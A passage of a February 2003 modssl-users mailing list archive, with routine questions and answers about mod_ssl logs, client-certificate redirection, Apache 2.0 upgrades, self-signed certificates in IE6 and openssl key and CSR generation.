OpenSSL 0.9.6g in the aforementioned log entry indicating that mod_ssl
included older OpenSSL code, or is the reference to 0.9.6 indicating
that something is misconfigured on my box?

Thanks for any thoughts.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Feb  4 08:01:38 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 00ECB2AA0BF; Tue,  4 Feb 2003 08:01:37 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 84AED2AA08B
	for ; Tue,  4 Feb 2003 08:01:35 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id 2E6C96E4013; Tue,  4 Feb 2003 08:01:31 +0100 (CET)
Date: Tue, 4 Feb 2003 08:01:31 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: log question
Message-ID: <20030204070130.GA2663@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Feb 03, 2003 at 08:15:21PM -0600, Kurt A. Buckardt wrote:
> Two dumb questions:
> 1: If it is informational, why is it in an error log?

That is how it has been done with apache - your LogLevel is set so that
this type of errors goes into the ErrorLog. Given that there is usually
only an access and an error log, this is the only place.

> 2: I have configured OpenSSL 0.9.7 on this box.  Previously (before
> Apache was installed) it had OpenSSL 0.9.6g.  Is the reference to
> OpenSSL 0.9.6g in the aforementioned log entry indicating that mod_ssl
> included older OpenSSL code, or is the reference to 0.9.6 indicating
> that something is misconfigured on my box?
> 
The openssl version number is defined at compile time, so even with a
new openssl you wouldn't see a difference. Wether it has in fact been
updated depends on wether openssl was linked statically or dynamically
into mod_ssl. If ldd is available on your os, then you can try:

ldd SERVER_ROOT/libexec/libssl.so

(SERVER_ROOT is usually /usr/local/apache/)
It will tell you which libraries libssl is linked to.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Feb  4 16:07:10 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 01C0A2AA0BF; Tue,  4 Feb 2003 16:07:09 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from dns1.tgnet.cz (dns1.tgnet.cz [212.80.66.7])
	by master.modssl.org (Postfix) with ESMTP id CE7252AA08B
	for ; Tue,  4 Feb 2003 16:07:08 +0100 (CET)
Received: from localhost (rad@localhost)
	by dns1.tgnet.cz (8.11.6/8.11.6) with ESMTP id h14F78819248
	for ; Tue, 4 Feb 2003 16:07:08 +0100
Date: Tue, 4 Feb 2003 16:07:08 +0100 (CET)
From: 
X-X-Sender:  
To: 
Subject: Invalid method in request \x80z\x01\x03\x01
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello!
I'm using apache modssl and I'm not able to connect to port 443.
This problem is betwen server and client communication (HTTP versus 
HTTPS), I think. But I don't know, how to solve this.

error_log:
Invalid method in request \x80L\x01\x03

host# /usr/bin/openssl s_client -connect myIP:443 -state -debug
CONNECTED(00000003)
SSL_connect:before/connect initialization
write to 0808D4C0 [0809D000] (124 bytes => 124 (0x7C))
0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00   .z....Q... .....
0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04   .........f......
0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00   ...........e..d.
0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00   .c..b..a..`.....
0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08   ......@.........
0050 - 00 00 06 00 00 03 04 00-80 02 00 80 af 78 8c e2   .............x..
0060 - 0e ff ff 96 5b 2d 4e 31-6d c5 47 01 b0 61 c5 33   ....[-N1m.G..a.3
0070 - 39 b1 4f dd 0e b2 7b 3d-0a 2f 3e 7b               9.O...{=./>{
SSL_connect:SSLv2/v3 write client hello A
read from 0808D4C0 [080A3000] (7 bytes => 7 (0x7))
0000 - 3c 21 44 4f 43 54 59                              
    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars

CustomLog /var/log/httpd/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"




Please, can you help me? 

Thanx a lot!




-- 
Radek 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb  5 09:08:26 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AB56B2AA09A; Wed,  5 Feb 2003 09:08:26 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from smtp06.wxs.nl (smtp06.wxs.nl [195.121.6.58])
	by master.modssl.org (Postfix) with ESMTP id 924B52AA095
	for ; Wed,  5 Feb 2003 09:08:24 +0100 (CET)
Received: from apps18.wxs.nl ([195.121.7.151]) by smtp06.wxs.nl
          (Netscape Messaging Server 4.15) with ESMTP id H9TT9800.J8O;
          Wed, 5 Feb 2003 09:07:56 +0100 
Message-ID: <190475.1044432497036.JavaMail.root@apps18.wxs.nl>
Date: Wed, 5 Feb 2003 09:08:17 +0100 (CET)
From: cybersushi@planet.nl
To: olebedew@vil.com.ua, modssl-users@modssl.org
Subject: Redirection on bad cert
Mime-Version: 1.0
Content-Type: multipart/mixed; 
	boundary="----=_Part_5049_6275870.1044432497034"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: cybersushi@planet.nl
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_5049_6275870.1044432497034
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Hi,

As long as you're still in the SSL handshake phase (checking the client certs etc), you're not able to redirect the client to an error page.  In this phase you're not talking HTTP yet.

The only way I know to solve this is to allow  all  clients to pass  (by setting SSLClientVerifiy to optional) and passing the result to your webapp (by setting SSLOptions +StdEnvVars) . Than the webapp can decide whether to allow the client in or redirect it to a specific  error page.

Hope this helps,

Danny
>Hello all,
>
>Is it possible to redirect user with bad cert to other page?
>As I understand, server doesn't return any error code after ssl error on
>expired cert. Therefore, ErrorDocument directive doesn,t work.
>
>Thank You
>Oleg Lebedev
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

------=_Part_5049_6275870.1044432497034--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb  5 10:34:46 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D91512AA09A; Wed,  5 Feb 2003 10:34:45 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from vil.com.ua (vil.com.ua [193.109.102.42])
	by master.modssl.org (Postfix) with ESMTP id C39132AA086
	for ; Wed,  5 Feb 2003 10:34:41 +0100 (CET)
Received: from homecomp ([217.196.168.152])
	by vil.com.ua (8.12.6/8.12.5) with SMTP id h159YK3l032610
	for ; Wed, 5 Feb 2003 11:34:22 +0200 (EET)
	(envelope-from olebedew@vil.com.ua)
Message-ID: <002901c2ccf9$f75dae30$98a8c4d9@homecomp>
From: "Oleg Lyebyedyev" 
To: 
References: <190475.1044432497036.JavaMail.root@apps18.wxs.nl>
Subject: Re: Redirection on bad cert
Date: Wed, 5 Feb 2003 11:35:46 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="koi8-r"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Oleg Lyebyedyev" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

> Hi,
>
> As long as you're still in the SSL handshake phase (checking the client
certs etc), you're not able to redirect the client to an error page.  In
this phase you're not talking HTTP yet.

Thank you for explanation!

>
> The only way I know to solve this is to allow  all  clients to pass  (by
setting SSLClientVerifiy to optional) and passing the result to your webapp
(by setting SSLOptions +StdEnvVars) . Than the webapp can decide whether to
allow the client in or redirect it to a specific  error page.

I did it. O works well when client has no cert at all, but when cert exists
but expired - I received errors: DNS error on MSIE and I/O error on NS.

Error_log contans the following:
[error] mod_ssl: Certificate Verification: Error (10): Certificate has
expired
[error] mod_ssl: SSL handshake failed (server www.host.com:443, client
207.17.47.143) (OpenSSL library error follows)
[error] OpenSSL: error:140890B2:SSL routines:SSL3_GET_CLIENT_CERTIFICATE:no
certificate returned

The same result with optional_no_ca.

>
> Hope this helps,
>
> Danny
> >Hello all,
> >
> >Is it possible to redirect user with bad cert to other page?
> >As I understand, server doesn't return any error code after ssl error on
> >expired cert. Therefore, ErrorDocument directive doesn,t work.
> >
> >Thank You
> >Oleg Lebedev
> >
> >
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb  5 15:16:01 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D13CB2AA09A; Wed,  5 Feb 2003 15:16:00 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from flamingo.mail.pas.earthlink.net (flamingo.mail.pas.earthlink.net [207.217.120.232])
	by master.modssl.org (Postfix) with ESMTP id 364022AA086
	for ; Wed,  5 Feb 2003 15:15:59 +0100 (CET)
Received: from h-69-3-138-42.snvacaid.covad.net ([69.3.138.42] helo=RON1QM4JVWEP50)
	by flamingo.mail.pas.earthlink.net with smtp (Exim 3.33 #1)
	id 18gQLE-0003mg-00
	for modssl-users@modssl.org; Wed, 05 Feb 2003 06:15:56 -0800
From: "Ron McKeever" 
To: 
Subject: Upgrade to 2.0.44 ?
Date: Wed, 5 Feb 2003 06:15:03 -0800
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ron McKeever" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I currently have mod_ssl-2.8.12-1.3.27.apache that I installed and
downloaded from mod_ssl.org. I'm looking at going to 2.0.11 apache.

I know with other versions of mod_ssl/apache when I upgraded I did the
following:

Give mod_ssl-2.8.new the Apache 1.3.new *source* directory for
its --with-apache= argument.  Then when you configure apache, tell it to
*install* to the same location that 1.3.old is currently installed using
--prefix= (eg /usr/local/apache) and use the same directory structure
(using --with-layout= ) that you used before, if any.  Then when you run
'make install' from the Apache 1.3.new source directory, it will overwrite
your 1.3.old installation.

Do I do the same thing with upgrading to apache 2.0.44? Since mod_ssl is
built-in to the new apache version I was thinking it might be different.
Thanks

Ron

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb  5 15:34:59 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5BA962AA09A; Wed,  5 Feb 2003 15:34:59 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from th23.opsion.fr (th23.opsion.fr [62.39.122.33])
	by master.modssl.org (Postfix) with SMTP id 092072AA086
	for ; Wed,  5 Feb 2003 15:34:58 +0100 (CET)
Received: from 212.180.95.194 [212.180.95.194] by th23.opsion.fr id 200302051432.02d6; Wed, 5 Feb 2003 14:32:02 GMT
Message-ID: <3E412077.5030802@ifrance.com>
Date: Wed, 05 Feb 2003 15:32:23 +0100
From: Estrade Matthieu 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20021120 Netscape/7.01
X-Accept-Language: fr-fr, en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Upgrade to 2.0.44 ?
References: 
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Estrade Matthieu 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

In apache 2.0, mod_ssl is buit in, so to enable it when you compile, 
just do:

httpd-2.0.44#./configure --prefix=path --enable-ssl 
--with-ssl=path-to-openssl

like ./configure --prefix=/usr/local/apache --enable-ssl 
--with-ssl=/usr/local/openssl/bin/openssl

if you want to use SSL crypto hardware, you have to enable it with 
CFLAGS="-DSSL_EXPERIMENTAL -DSSL_ENGINE"
keep your configure script, and whe you will want to upgrade your apache 
2.0 to next version, just launch the script and make to rebuild the new 
apache.
and will not overwrite old install...

It's easier with apache 2.0 :)

regards,

E.M
 



Ron McKeever wrote:

>Hello,
>
>I currently have mod_ssl-2.8.12-1.3.27.apache that I installed and
>downloaded from mod_ssl.org. I'm looking at going to 2.0.11 apache.
>
>I know with other versions of mod_ssl/apache when I upgraded I did the
>following:
>
>Give mod_ssl-2.8.new the Apache 1.3.new *source* directory for
>its --with-apache= argument.  Then when you configure apache, tell it to
>*install* to the same location that 1.3.old is currently installed using
>--prefix= (eg /usr/local/apache) and use the same directory structure
>(using --with-layout= ) that you used before, if any.  Then when you run
>'make install' from the Apache 1.3.new source directory, it will overwrite
>your 1.3.old installation.
>
>Do I do the same thing with upgrading to apache 2.0.44? Since mod_ssl is
>built-in to the new apache version I was thinking it might be different.
>Thanks
>
>Ron
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>_____________________________________________________________________
>GRAND JEU SMS : Pour gagner un NOKIA 7650, envoyez le mot IF au 61321
>(prix d'un SMS + 0.35 euro). Un SMS vous dira si vous avez gagné.
>Règlement : http://www.ifrance.com/_reloc/sign.sms
>
>  
>


_____________________________________________________________________
Envie de discuter en "live" avec vos amis ? Télécharger MSN Messenger
http://www.ifrance.com/_reloc/m la 1ère messagerie instantanée de France

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb  5 16:29:26 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F0E9B2AA0A8; Wed,  5 Feb 2003 16:29:25 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from web11705.mail.yahoo.com (web11705.mail.yahoo.com [216.136.172.71])
	by master.modssl.org (Postfix) with SMTP id 1D6602AA09A
	for ; Wed,  5 Feb 2003 16:29:24 +0100 (CET)
Message-ID: <20030205152917.74417.qmail@web11705.mail.yahoo.com>
Received: from [65.213.201.18] by web11705.mail.yahoo.com via HTTP; Wed, 05 Feb 2003 07:29:17 PST
Date: Wed, 5 Feb 2003 07:29:17 -0800 (PST)
From: James Kilton 
Subject: Issue with IE6 and a self-signed cert.
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: James Kilton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello.

I'm trying out modssl for the first time on Apache
1.3.27.  I followed the instructions in the modssl
INSTALL file to install both modssl and Apache.  I
went with option 2 because I also needed to integrate
PHP with Apache.

When I ran 'make certificate', I used TYPE=custom
because I wanted to self-sign it.  This all seemed to
go well -- the CA cert was created, then the server's
cert was created and signed.
 
When I go to the site in IE, however, I always get the
pop-up that warns about the cert being signed by an
untrusted CA.  If I try to install the cert into my
trusted root store, IE says the import has succeeded
but the cert doesn't appear in the store, and I
continue to get the popup warning.  I've tried this
several times to no avail.

I've never run into anything like this so I'm somewhat
at a loss.  I created and imported a cert in Tomcat 
he other day and it went fine, but for some reason IE 
doesn't seem to like this one.  Has anyone ever
experienced anything like this?  Any advice would be
appreciated.
 
Thanks.

__________________________________________________
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
http://mailplus.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb  5 16:31:25 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6C1FA2AA0A8; Wed,  5 Feb 2003 16:31:25 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from vulcan.bascom.com (vulcan.bascom.com [206.112.62.10])
	by master.modssl.org (Postfix) with ESMTP id E65672AA09A
	for ; Wed,  5 Feb 2003 16:31:23 +0100 (CET)
Received: (from root@localhost)
	by vulcan.bascom.com (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) id h15FVLs16033
	for modssl-users@modssl.org; Wed, 5 Feb 2003 10:31:21 -0500
Received: from dcomo2000 (sandstorm-red.bascom.com [206.112.62.241])
	by vulcan.bascom.com (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) with SMTP id h15FVGs15972
	for ; Wed, 5 Feb 2003 10:31:16 -0500
From: "Drew J. Como" 
To: 
Subject: RE: Issue with IE6 and a self-signed cert.
Date: Wed, 5 Feb 2003 10:30:37 -0500
Message-ID: <001d01c2cd2b$89013240$13013c0a@dcomo2000>
MIME-Version: 1.0
X-scanner: scanned by Inflex 1.0.12.2 - (http://pldaniels.com/inflex/)
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0)
In-Reply-To: <20030205152917.74417.qmail@web11705.mail.yahoo.com>
Importance: Normal
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
X-Spam-Status: No, hits=-100.0 required=7.0
	tests=IN_REP_TO,SPAM_PHRASE_00_01,USER_AGENT_OUTLOOK,
	      USER_IN_WHITELIST
	version=2.42
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Drew J. Como" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have run into this problem as well and have
not found a resolution to it either.  If you do
find the answer, please let me know!!

============================================
Drew J. Como             Phone: 631-434-6600
Systems Administrator      Fax: 631-434-7800
dcomo@bascom.com         Web: www.bascom.com
    Bascom Global Internet Services, Inc.
--------------------------------------------
          "When quality is the goal, 
           winning is guaranteed."  


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of James Kilton
Sent: Wednesday, February 05, 2003 10:29 AM
To: modssl-users@modssl.org
Subject: Issue with IE6 and a self-signed cert.


Hello.

I'm trying out modssl for the first time on Apache
1.3.27.  I followed the instructions in the modssl
INSTALL file to install both modssl and Apache.  I
went with option 2 because I also needed to integrate
PHP with Apache.

When I ran 'make certificate', I used TYPE=custom
because I wanted to self-sign it.  This all seemed to
go well -- the CA cert was created, then the server's
cert was created and signed.
 
When I go to the site in IE, however, I always get the
pop-up that warns about the cert being signed by an
untrusted CA.  If I try to install the cert into my
trusted root store, IE says the import has succeeded
but the cert doesn't appear in the store, and I
continue to get the popup warning.  I've tried this
several times to no avail.

I've never run into anything like this so I'm somewhat
at a loss.  I created and imported a cert in Tomcat 
he other day and it went fine, but for some reason IE 
doesn't seem to like this one.  Has anyone ever
experienced anything like this?  Any advice would be
appreciated.
 
Thanks.

__________________________________________________
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
http://mailplus.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb  5 19:32:33 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 43DDC2AA095; Wed,  5 Feb 2003 19:32:33 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from web41507.mail.yahoo.com (web41507.mail.yahoo.com [66.218.93.90])
	by master.modssl.org (Postfix) with SMTP id 55F362AA09A
	for ; Wed,  5 Feb 2003 19:32:26 +0100 (CET)
Message-ID: <20030205183218.56221.qmail@web41507.mail.yahoo.com>
Received: from [204.31.182.136] by web41507.mail.yahoo.com via HTTP; Wed, 05 Feb 2003 10:32:18 PST
Date: Wed, 5 Feb 2003 10:32:18 -0800 (PST)
From: kulkarni veena 
Subject: newbie: help to create ssl connection.
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-1869379717-1044469938=:55714"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: kulkarni veena 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-1869379717-1044469938=:55714
Content-Type: text/plain; charset=us-ascii


Hi,

I'm new to all this ssl thing and I wanted to create a ssl connection for online store using modssl. Could you please advice how do i get started?

Thanks in advance.

Veena Kulkarni



---------------------------------
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now
--0-1869379717-1044469938=:55714
Content-Type: text/html; charset=us-ascii


Hi,


I'm new to all this ssl thing and I wanted to create a ssl connection for online store using modssl. Could you please advice how do i get started?


Thanks in advance.


Veena Kulkarni

Do you Yahoo!?

Yahoo! Mail Plus - Powerful. Affordable. Sign up now
--0-1869379717-1044469938=:55714--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb  5 19:46:13 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 33F732AA09A; Wed,  5 Feb 2003 19:46:13 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from vopmail.pshift.com (mail.pshift.com [63.166.217.30])
	by master.modssl.org (Postfix) with ESMTP id DED922AA086
	for ; Wed,  5 Feb 2003 19:46:01 +0100 (CET)
Received: from WKSJustin (unverified [63.166.217.49]) by vopmail.pshift.com
 (Vircom SMTPRS 1.4.230) with ESMTP id  for ;
 Wed, 5 Feb 2003 13:41:31 -0500
Message-ID: <009601c2cd46$d6139e90$6700a8c0@WKSJustin>
From: "Justin Williams" 
To: 
References: <20030205183218.56221.qmail@web41507.mail.yahoo.com>
Subject: Re: newbie: help to create ssl connection.
Date: Wed, 5 Feb 2003 13:46:04 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0093_01C2CD1C.ED38DBA0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Justin Williams" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0093_01C2CD1C.ED38DBA0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Thawte.com, actually, has a great step-by-step on this one  That's where =
the following comes from:
1- make sure you know the full domain name (https://www.domain.com)
2- pick 5 random files that are of moderate size (I use about a 5K =
file).  Thawte refers to these files as file1:file2:file3...
3- generate the key as follows:
openssl genrsa -des3 -rand file1:file2:file3:file4:file5 -out =
www.domain.com.key (you can leave out the -des3, if you are confident =
and secure about your server)
4- generate the CSR from the key:
openssl -req -new -key www.domain.com.key -out www.domain.com.csr =
(common name, when you are prompted, is not YOUR name, but the complete =
and entire domain name)
5- generate a temporary, self-signed CRT from the CSR:
openssl x509 -req -days 30 -in www.domain.com.csr -signkey =
www.domain.com.key -out www.domain.com.crt

You will then send the CSR to the CA of your choice.  Whenthey send you =
the CRT back, replace your temporary CRT with the real one.
  ----- Original Message -----=20
  From: kulkarni veena=20
  To: modssl-users@modssl.org=20
  Sent: Wednesday, February 05, 2003 1:32 PM
  Subject: newbie: help to create ssl connection.


  Hi,

  I'm new to all this ssl thing and I wanted to create a ssl connection =
for online store using modssl. Could you please advice how do i get =
started?

  Thanks in advance.

  Veena Kulkarni





-------------------------------------------------------------------------=
-----
  Do you Yahoo!?
  Yahoo! Mail Plus - Powerful. Affordable. Sign up now
------=_NextPart_000_0093_01C2CD1C.ED38DBA0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Thawte.com, actually, has a great =
step-by-step on=20
this one  That's where the following comes from:


1- make sure you know the full domain =
name (https://www.domain.com)


2- pick 5 random files that are of =
moderate size (I=20
use about a 5K file).  Thawte refers to these files as=20
file1:file2:file3...


3- generate the key as =
follows:


openssl genrsa -des3 -rand=20
file1:file2:file3:file4:file5 -out www.domain.com.key (you can leave =
out the=20
-des3, if you are confident and secure about your server)


4- generate the CSR from the =
key:


openssl -req -new -key www.domain.com.key -out www.domain.com.csr (common name, =
when you=20
are prompted, is not YOUR name, but the complete and entire domain=20
name)


5- generate a temporary, =
self-signed CRT=20
from the CSR:


openssl x509 -req -days 30 -in www.domain.com.csr -signkey www.domain.com.key -out www.domain.com.crt


 


You will then send the CSR to the CA of =
your=20
choice.  Whenthey send you the CRT back, replace your temporary CRT =
with=20
the real one.


  
----- Original Message ----- 

  From:=20
  kulkarni=20
  veena 

  
  
Sent: Wednesday, February 05, =
2003 1:32=20
  PM

  
Subject: newbie: help to create =
ssl=20
  connection.

  


  
Hi,

  
I'm new to all this ssl thing and I wanted to create a ssl =
connection for=20
  online store using modssl. Could you please advice how do i get =
started?

  
Thanks in advance.

  
Veena Kulkarni

  


  

  Do you Yahoo!?
Yaho=
o! Mail=20
  Plus - Powerful. Affordable. Sign=
 up=20
  now


------=_NextPart_000_0093_01C2CD1C.ED38DBA0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb  5 21:32:23 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 68D412AA09A; Wed,  5 Feb 2003 21:32:23 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from web41503.mail.yahoo.com (web41503.mail.yahoo.com [66.218.93.86])
	by master.modssl.org (Postfix) with SMTP id D9BCB2AA086
	for ; Wed,  5 Feb 2003 21:32:16 +0100 (CET)
Message-ID: <20030205203214.87836.qmail@web41503.mail.yahoo.com>
Received: from [204.31.182.136] by web41503.mail.yahoo.com via HTTP; Wed, 05 Feb 2003 12:32:14 PST
Date: Wed, 5 Feb 2003 12:32:14 -0800 (PST)
From: kulkarni veena 
Subject: Re: newbie: help to create ssl connection.
To: modssl-users@modssl.org
In-Reply-To: <009601c2cd46$d6139e90$6700a8c0@WKSJustin>
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-1874040191-1044477134=:87556"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: kulkarni veena 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-1874040191-1044477134=:87556
Content-Type: text/plain; charset=us-ascii


